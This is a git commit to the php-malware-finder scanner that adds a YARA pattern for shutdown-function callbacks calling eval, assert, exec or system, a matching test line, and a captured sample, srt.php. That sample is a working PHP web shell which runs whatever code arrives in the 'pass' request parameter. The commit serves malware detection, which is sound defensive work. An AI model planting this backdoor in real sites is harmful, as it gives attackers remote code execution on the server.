Add a detection for register_shutdown_function

Close #41

3 files changed, 7 insertions, 0 deletions

diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 8a08308..c3e115a 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -91,6 +91,7 @@ rule DodgyPhp
         $include = /include\s*\(\s*[^\.]+\.(png|jpg|gif|bmp)/  // Clever includes
         $ini_get = /ini_(get|set|restore)\s*\(\s*['"](safe_mode|open_basedir|disable_function|safe_mode_exec_dir|safe_mode_include_dir|register_globals|allow_url_include)/ nocase
         $pr = /(preg_replace(_callback)?|mb_ereg_replace|preg_filter)\s*\(.+(\/|\\x2f)(e|\\x65)['"]/  nocase // http://php.net/manual/en/function.preg-replace.php
+        $register_function = /register_[a-z]+_function\s*\(\s*['"]\s*(eval|assert|passthru|exec|include|system|shell_execute|`)/  // https://github.com/nbs-system/php-malware-finder/issues/41
         $safemode_bypass = /\x00\/\.\.\/|LD_PRELOAD/
         $shellshock = /\(\)\s*{\s*:\s*;\s*}\s*;/
         $udp_dos = /fsockopen\s*\(\s*['"]udp:\/\// nocase
diff --git a/php-malware-finder/samples/real/srt.php b/php-malware-finder/samples/real/srt.php
new file mode 100644
index 0000000..ef02af2
--- /dev/null
+++ b/php-malware-finder/samples/real/srt.php
@@ -0,0 +1,5 @@
+<?php 
+ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); 
+echo $_REQUEST['pass']; 
+ob_end_flush(); 
+?>
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index d362a14..a261199 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -92,6 +92,7 @@ run_test real/sucuri_2014_04.php '0x67:$execution3:'
 run_test real/novahot.php 'DodgyStrings'
 run_test real/guidtz.php '0x12d8:$non_printables:'
 run_test real/ice.php 'double_var'
+run_test real/srt.php '$register_function'
 
 # Asp files
 run_test_asp classic/cmdasp.asp 'DodgyStrings'